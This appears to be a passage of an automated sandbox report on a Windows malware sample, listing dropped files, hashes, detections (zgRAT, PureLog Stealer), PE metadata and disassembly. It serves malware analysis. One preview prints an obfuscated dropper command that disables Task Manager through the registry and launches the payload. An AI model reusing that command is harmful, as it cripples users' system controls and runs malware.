                                                                                                                  MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                                                                  SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                                                                  SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                                                                  SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                  • Antivirus: ReversingLabs, Detection: 17%
                                                                                                                  Process:C:\webHostnet\MsPortSavesruntime.exe
                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):32256
                                                                                                                  Entropy (8bit):5.631194486392901
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                                                                  MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                                                                  SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                                                                  SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                                                                  SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: ReversingLabs, Detection: 24%
                                                                                                                  Process:C:\webHostnet\MsPortSavesruntime.exe
                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):85504
                                                                                                                  Entropy (8bit):5.8769270258874755
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                                                                                  MD5:E9CE850DB4350471A62CC24ACB83E859
                                                                                                                  SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                                                                                  SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                                                                                  SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                  • Antivirus: ReversingLabs, Detection: 71%
                                                                                                                  Process:C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):85504
                                                                                                                  Entropy (8bit):5.8769270258874755
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                                                                                  MD5:E9CE850DB4350471A62CC24ACB83E859
                                                                                                                  SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                                                                                  SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                                                                                  SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                  • Antivirus: ReversingLabs, Detection: 71%
                                                                                                                  Process:C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):32256
                                                                                                                  Entropy (8bit):5.631194486392901
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                                                                  MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                                                                  SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                                                                  SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                                                                  SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: ReversingLabs, Detection: 24%
                                                                                                                  Process:C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):23552
                                                                                                                  Entropy (8bit):5.519109060441589
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                                                                                                  MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                                                                                                  SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                                                                                                  SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                                                                                                  SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                  • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                  Process:C:\webHostnet\MsPortSavesruntime.exe
                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):23552
                                                                                                                  Entropy (8bit):5.519109060441589
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                                                                                                  MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                                                                                                  SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                                                                                                  SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                                                                                                  SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                  • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                  Process:C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):9728
                                                                                                                  Entropy (8bit):5.0168086460579095
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:96:b2+4Af/qPl98sgn8VenjzRR0xXzhZ7BiCTUk9v2G6/7jK6XsBG7hWuP9LfqpW0RQ:gCU8XKb7BDUieGi3jcBgLyB+b
                                                                                                                  MD5:69546E20149FE5633BCBA413DC3DC964
                                                                                                                  SHA1:29FEB42AB8B563FAFACFD27FAE48D4019A4CBCC2
                                                                                                                  SHA-256:B48CA16B9BA2B44BF13051705B8E12D587D80262F57F7B2595AD1DD7854A86C6
                                                                                                                  SHA-512:90D5F6C334B8064ED6DD002B03C57CEBBFAC1620D6CB2B79103DB0369D3A4FD82DB092E675F387AB0BDFE20303D9AC37F4E150896FC333E6F83B00269F012236
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: ReversingLabs, Detection: 4%
                                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                                  File Type:JSON data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):55
                                                                                                                  Entropy (8bit):4.306461250274409
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                                  MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                  SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                  SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                  SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                  Malicious:false
                                                                                                                  Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                                                                  Process:C:\webHostnet\MsPortSavesruntime.exe
                                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1930240
                                                                                                                  Entropy (8bit):7.544591098529135
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:24576:3op1VaW6LOFlNM9TJozhpuCebFQQYJkvoAgNpjYsKyX0IS1/XF1vsnPVU82rRrcP:Y8WeJJUFAFQGoAgNCw0J1/XfkP/qcd
                                                                                                                  MD5:4F593957FF5A8313DC52738F85592CBA
                                                                                                                  SHA1:DC5E3E8F14B9C6E6541947E55B195B8EFEBF22D7
                                                                                                                  SHA-256:1D85033F5C6BC5927CB48364F91D455F2263DFF76505D9849E5E4958CB6C173F
                                                                                                                  SHA-512:0E4C741BA7FD0E99E504606000E2190B6C9AFCB4349F80C6610DA2F974C8A466FD9C22DF000B65D46AF72C4970E826ED77533FE2307270A70A044B36AEB1814A
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: ReversingLabs, Detection: 67%
                                                                                                                  Process:C:\Users\user\Desktop\PbfYaIvR5B.exe
                                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1930240
                                                                                                                  Entropy (8bit):7.544591098529135
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:24576:3op1VaW6LOFlNM9TJozhpuCebFQQYJkvoAgNpjYsKyX0IS1/XF1vsnPVU82rRrcP:Y8WeJJUFAFQGoAgNCw0J1/XfkP/qcd
                                                                                                                  MD5:4F593957FF5A8313DC52738F85592CBA
                                                                                                                  SHA1:DC5E3E8F14B9C6E6541947E55B195B8EFEBF22D7
                                                                                                                  SHA-256:1D85033F5C6BC5927CB48364F91D455F2263DFF76505D9849E5E4958CB6C173F
                                                                                                                  SHA-512:0E4C741BA7FD0E99E504606000E2190B6C9AFCB4349F80C6610DA2F974C8A466FD9C22DF000B65D46AF72C4970E826ED77533FE2307270A70A044B36AEB1814A
                                                                                                                  Malicious:true
                                                                                                                  Yara Hits:
                                                                                                                  • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\webHostnet\MsPortSavesruntime.exe, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\webHostnet\MsPortSavesruntime.exe, Author: Joe Security
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: ReversingLabs, Detection: 67%
                                                                                                                  Process:C:\webHostnet\MsPortSavesruntime.exe
                                                                                                                  File Type:ASCII text, with very long lines (369), with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):369
                                                                                                                  Entropy (8bit):5.838092212107247
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:6:LAJqBMKzDp/9fr/rqnP0Lgclv0CJbCJH2dFB+e+4UsINwTxPf3246RuBgJyfc:CEp/wnP0MI0CxYNkxPf3h6Rc2F
                                                                                                                  MD5:50E7C17B10E2DFABA1A842B111FAD9EC
                                                                                                                  SHA1:E914A998004E559AB897C11243346C53BF30D500
                                                                                                                  SHA-256:2E95E530770CF5128B55D448DDA0B5558578B6FC6B14920FEE371272511D8021
                                                                                                                  SHA-512:8B03CBFE5E2AECC5CABE27000E877526910081F37C7513242A5BFFA48F6C53AC9D86B0A5F1F141033B71597352DD5E327260D1B4F95C31EF6C69A60FED9AF074
                                                                                                                  Malicious:false
                                                                                                                  Process:C:\webHostnet\MsPortSavesruntime.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):283
                                                                                                                  Entropy (8bit):5.761422712987861
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:6:zz3XnHNdan7rlCpXtNimzv6OZUPfEt8Bega/QoVyHB4PWep:zz3dWhCprPzvhZUPfg8BK/QosHwWep
                                                                                                                  MD5:56A4B7FF2DC8E765DE75B4D348E4AFD0
                                                                                                                  SHA1:B8CE24F2D5AF0AEB8E8A12B57CDC481302FF5DEB
                                                                                                                  SHA-256:5B321F38375201B8399FE9B5E9F42B0A8518FE542A6CAF17E7B9E9986030884E
                                                                                                                  SHA-512:295A631DE508ED53164FE5261A66C6D13841C45DE62F8D8CC15D9D2541161688F65ADCAE2F57675B767FDA278E8091D8BA2EACD6A1FA7A7D2794A0255D7AF48E
                                                                                                                  Malicious:false
                                                                                                                  Process:C:\Users\user\Desktop\PbfYaIvR5B.exe
                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):197
                                                                                                                  Entropy (8bit):5.334619114551162
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:6:vXmStuH1jhRiI36BTD6ATuUk0VeOJA9uPWI:/gVjhR136qKtVnYuPWI
                                                                                                                  MD5:C68424D522237CF78AA4511E34E7ABDA
                                                                                                                  SHA1:0E6BD31AC5C94B2F7BAF9952E722181746327F20
                                                                                                                  SHA-256:52CA02FB677CF28F98813C29DBCE9D521A3257006DE1289538B313AC34CBAB58
                                                                                                                  SHA-512:5487E35A5F98D224311997E7906D999C0A496AFF5EC0A2C364566BEF64D16E2F79BEC2A06558363D337453B9DA5734DEAB157CA20868B02BFB22933C1F1E5791
                                                                                                                  Malicious:false
                                                                                                                  Preview:%WYkFFPZPPodb%reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f%DfmAEeOd%..%KYmOe%"C:\webHostnet/MsPortSavesruntime.exe"%XhsygUYjiVWTsMG%
                                                                                                                  Process:C:\Users\user\Desktop\PbfYaIvR5B.exe
                                                                                                                  File Type:data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):243
                                                                                                                  Entropy (8bit):5.909145146566472
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:6:GmgwqK+NkLzWbH7MrFnBaORbM5nCvdhHbNFZjiIDViO29:G0MCzWL7MhBaORbQCFhHbNvjfD729
                                                                                                                  MD5:C502F6060BF849E72AB58258F8B8BCF2
                                                                                                                  SHA1:728683A638D413AC1706BB139E6D3A8B54EF5431
                                                                                                                  SHA-256:485DFCFE33027D5023830E32AC17F0EBBC36048EFCC48DB58FE10FE1D4CC341E
                                                                                                                  SHA-512:EA6563D1338E382E6109DF8F16E0F67A6355AC766786F86D2FA011BDB274DA2ED7DAFCA508FB6CADE0E6725D6BDA37166CDFF4805DEF1BCB1C82BF0E9A9BB63E
                                                                                                                  Malicious:false
                                                                                                                  Process:C:\Windows\System32\PING.EXE
                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):502
                                                                                                                  Entropy (8bit):4.622641701177187
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:12:PBww5pTcgTcgTcgTcgTcgTcgTcgTcgTcgTLs4oS/AFSkIrxMVlmJHaVzvv:ZjdUOAokItULVDv
                                                                                                                  MD5:95DE98EBB67D8DD95E3C1F4DC8C32D14
                                                                                                                  SHA1:94351D1885BC56489E5AB6A958EEF0A568C3A516
                                                                                                                  SHA-256:BB26C29FA30A2D765897BE02A2D17B00FC599E34BF5E8EDBC66774F31C9B2EF0
                                                                                                                  SHA-512:CEAC1EB7F61B085A25C74F8B71AE00BE0FA472DFB7EDB750DCDBD17336F3161E2D47BA82EC0B80A0C2687AF6EAF7093B5CC5253CBE414B8494C9875E54D43DD6
                                                                                                                  Malicious:false
                                                                                                                  Preview:..Pinging 364339 [::1] with 32 bytes of data:..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ....Ping statistics for ::1:.. Packets: Sent = 10, Received = 10, Lost = 0 (0% loss),..Approximate round trip times in milli-seconds:.. Minimum = 0ms, Maximum = 0ms, Average = 0ms..
                                                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                  Entropy (8bit):7.320441410879036
                                                                                                                  TrID:
                                                                                                                  • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                                                                  • Win32 Executable (generic) a (10002005/4) 49.97%
                                                                                                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                  • DOS Executable Generic (2002/1) 0.01%
                                                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                  File name:PbfYaIvR5B.exe
                                                                                                                  File size:2'319'208 bytes
                                                                                                                  MD5:7471eb468a1f0166167f369bec578915
                                                                                                                  SHA1:9ded35e930d112a8909dad6aaf1a657f65284588
                                                                                                                  SHA256:9e52adafb9ddb7668e8c025ebd74a856434b0c4c487a6204fe750e683bc3dbe4
                                                                                                                  SHA512:3f4abc590644d80a6fdebca9e0d2e1a28bbe220a2f48affa09707d9eaa0ab08077dfec58d6f3b78483459dd143cabd1c38ce3941f5766f06e0f1649b705078f8
                                                                                                                  SSDEEP:49152:IBTj8WeJJUFAFQGoAgNCw0J1/XfkP/qcdi:yf8W7W8AtX83qcdi
                                                                                                                  TLSH:3CB5AE0659924E37C26056318457D53D92A4DE722DA1EB0B3BDF2CA7B8137F0CA732A7
                                                                                                                  Icon Hash:3301136d6d826921
                                                                                                                  Entrypoint:0x41f530
                                                                                                                  Entrypoint Section:.text
                                                                                                                  Digitally signed:false
                                                                                                                  Imagebase:0x400000
                                                                                                                  Subsystem:windows gui
                                                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                                                                  Time Stamp:0x6220BF8D [Thu Mar 3 13:15:57 2022 UTC]
                                                                                                                  TLS Callbacks:
                                                                                                                  CLR (.Net) Version:
                                                                                                                  OS Version Major:5
                                                                                                                  OS Version Minor:1
                                                                                                                  File Version Major:5
                                                                                                                  File Version Minor:1
                                                                                                                  Subsystem Version Major:5
                                                                                                                  Subsystem Version Minor:1
                                                                                                                  Import Hash:12e12319f1029ec4f8fcbed7e82df162
                                                                                                                  Instruction
                                                                                                                  call 00007F2FB083936Bh
                                                                                                                  jmp 00007F2FB0838C7Dh
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  push ebp
                                                                                                                  mov ebp, esp
                                                                                                                  push esi
                                                                                                                  push dword ptr [ebp+08h]
                                                                                                                  mov esi, ecx
                                                                                                                  call 00007F2FB082BAC7h
                                                                                                                  mov dword ptr [esi], 004356D0h
                                                                                                                  mov eax, esi
                                                                                                                  pop esi
                                                                                                                  pop ebp
                                                                                                                  retn 0004h
                                                                                                                  and dword ptr [ecx+04h], 00000000h
                                                                                                                  mov eax, ecx
                                                                                                                  and dword ptr [ecx+08h], 00000000h
                                                                                                                  mov dword ptr [ecx+04h], 004356D8h
                                                                                                                  mov dword ptr [ecx], 004356D0h
                                                                                                                  ret
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  push ebp
                                                                                                                  mov ebp, esp
                                                                                                                  push esi
                                                                                                                  mov esi, ecx
                                                                                                                  lea eax, dword ptr [esi+04h]
                                                                                                                  mov dword ptr [esi], 004356B8h
                                                                                                                  push eax
                                                                                                                  call 00007F2FB083C10Fh
                                                                                                                  test byte ptr [ebp+08h], 00000001h
                                                                                                                  pop ecx
                                                                                                                  je 00007F2FB0838E0Ch
                                                                                                                  push 0000000Ch
                                                                                                                  push esi
                                                                                                                  call 00007F2FB08383C9h
                                                                                                                  pop ecx
                                                                                                                  pop ecx
                                                                                                                  mov eax, esi
                                                                                                                  pop esi
                                                                                                                  pop ebp
                                                                                                                  retn 0004h
                                                                                                                  push ebp
                                                                                                                  mov ebp, esp
                                                                                                                  sub esp, 0Ch
                                                                                                                  lea ecx, dword ptr [ebp-0Ch]
                                                                                                                  call 00007F2FB082BA42h
                                                                                                                  push 0043BEF0h
                                                                                                                  lea eax, dword ptr [ebp-0Ch]
                                                                                                                  push eax
                                                                                                                  call 00007F2FB083BBC9h
                                                                                                                  int3
                                                                                                                  push ebp
                                                                                                                  mov ebp, esp
                                                                                                                  sub esp, 0Ch
                                                                                                                  lea ecx, dword ptr [ebp-0Ch]
                                                                                                                  call 00007F2FB0838D88h
                                                                                                                  push 0043C0F4h
                                                                                                                  lea eax, dword ptr [ebp-0Ch]
                                                                                                                  push eax
                                                                                                                  call 00007F2FB083BBACh
                                                                                                                  int3
                                                                                                                  jmp 00007F2FB083D647h
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  push 00422900h
                                                                                                                  push dword ptr fs:[00000000h]
                                                                                                                  Programming Language:
                                                                                                                  • [ C ] VS2008 SP1 build 30729
                                                                                                                  • [IMP] VS2008 SP1 build 30729
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x3d070 | 0x34 | .rdata
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x3d0a4 | 0x50 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x64000 | 0x1e4dc | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x83000 | 0x233c | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x3b11c | 0x54 | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x355f8 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x33000 | 0x278 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x3c5ec | 0x120 | .rdata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x31bdc | 0x31c00 | 2831bb8b11e3209658a53131886cdf98 | False | 0.5909380888819096 | data | 6.712962136932442 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x33000 | 0xaec0 | 0xb000 | 042f11346230ca5aa360727d9908e809 | False | 0.4579190340909091 | data | 5.261605615899847 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x3e000 | 0x24720 | 0x1000 | 9670b581969e508258d8bc903025de5e | False | 0.451416015625 | data | 4.387459135575936 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.didat | 0x63000 | 0x190 | 0x200 | c83554035c63bb446c6208d0c8fa0256 | False | 0.4453125 | data | 3.3327310103022305 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x64000 | 0x1e4dc | 0x1e600 | e4ef30da99097319db5dbe5e18382adf | False | 0.18658371913580246 | data | 2.4755358130803757 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x83000 | 0x233c | 0x2400 | 40b5e17755fd6fdd34de06e5cdb7f711 | False | 0.7749565972222222 | data | 6.623012966548067 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
PNG | 0x64614 | 0xb45 | PNG image data, 93 x 302, 8-bit/color RGB, non-interlaced | English | United States | 1.0027729636048528
PNG | 0x6515c | 0x15a9 | PNG image data, 186 x 604, 8-bit/color RGB, non-interlaced | English | United States | 0.9363390441839495
RT_ICON | 0x66708 | 0x1537 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | | | 0.9802982876081753
RT_ICON | 0x67c40 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 3779 x 3779 px/m | | | 0.04127232935052644
RT_ICON | 0x78468 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16384, resolution 3779 x 3779 px/m | | | 0.07463391591875296
RT_ICON | 0x7c690 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 3779 x 3779 px/m | | | 0.10010373443983403
RT_ICON | 0x7ec38 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 3779 x 3779 px/m | | | 0.1346153846153846
RT_ICON | 0x7fce0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 3779 x 3779 px/m | | | 0.24911347517730498
RT_DIALOG | 0x80148 | 0x286 | data | English | United States | 0.5092879256965944
RT_DIALOG | 0x803d0 | 0x13a | data | English | United States | 0.60828025477707
RT_DIALOG | 0x8050c | 0xec | data | English | United States | 0.6991525423728814
RT_DIALOG | 0x805f8 | 0x12e | data | English | United States | 0.5927152317880795
RT_DIALOG | 0x80728 | 0x338 | data | English | United States | 0.45145631067961167
RT_DIALOG | 0x80a60 | 0x252 | data | English | United States | 0.5757575757575758
RT_STRING | 0x80cb4 | 0x1e2 | data | English | United States | 0.3900414937759336
RT_STRING | 0x80e98 | 0x1cc | data | English | United States | 0.4282608695652174
RT_STRING | 0x81064 | 0x1b8 | data | English | United States | 0.45681818181818185
RT_STRING | 0x8121c | 0x146 | data | English | United States | 0.5153374233128835
RT_STRING | 0x81364 | 0x46c | data | English | United States | 0.3454063604240283
RT_STRING | 0x817d0 | 0x166 | data | English | United States | 0.49162011173184356
RT_STRING | 0x81938 | 0x152 | data | English | United States | 0.5059171597633136
RT_STRING | 0x81a8c | 0x10a | data | English | United States | 0.49624060150375937
RT_STRING | 0x81b98 | 0xbc | data | English | United States | 0.6329787234042553
RT_STRING | 0x81c54 | 0xd6 | data | English | United States | 0.5747663551401869
RT_GROUP_ICON | 0x81d2c | 0x5a | data | | | 0.7666666666666667
RT_MANIFEST | 0x81d88 | 0x753 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.3957333333333333
DLL | Import
